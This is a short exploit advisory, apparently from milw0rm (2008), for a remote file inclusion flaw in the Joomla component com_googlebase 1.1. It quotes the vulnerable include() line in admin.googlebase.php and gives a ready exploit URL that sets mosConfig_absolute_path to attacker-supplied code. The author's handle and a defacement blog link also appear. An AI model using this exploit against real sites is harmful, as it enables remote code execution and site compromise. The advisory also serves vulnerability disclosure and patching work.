Software : com_googlebase version 1.1
Vendor : www.e-commerce-solution.co.uk
Download : http://www.joomlahacks.com/ [free download]
Author : cr4wl3r
Contact : cr4wl3r[4t]linuxmail[dot]org]
Blog : http://defacer.biz
=============================================================
[o] Vulnerable file
administrator/components/com_googlebase/admin.googlebase.php
include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );
[o] Exploit
http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?
mosConfig_absolute_path=[evilcode]
===============================================================
[o] Greetz
No Greetz
===========================================================
# milw0rm.com [2008-11-04]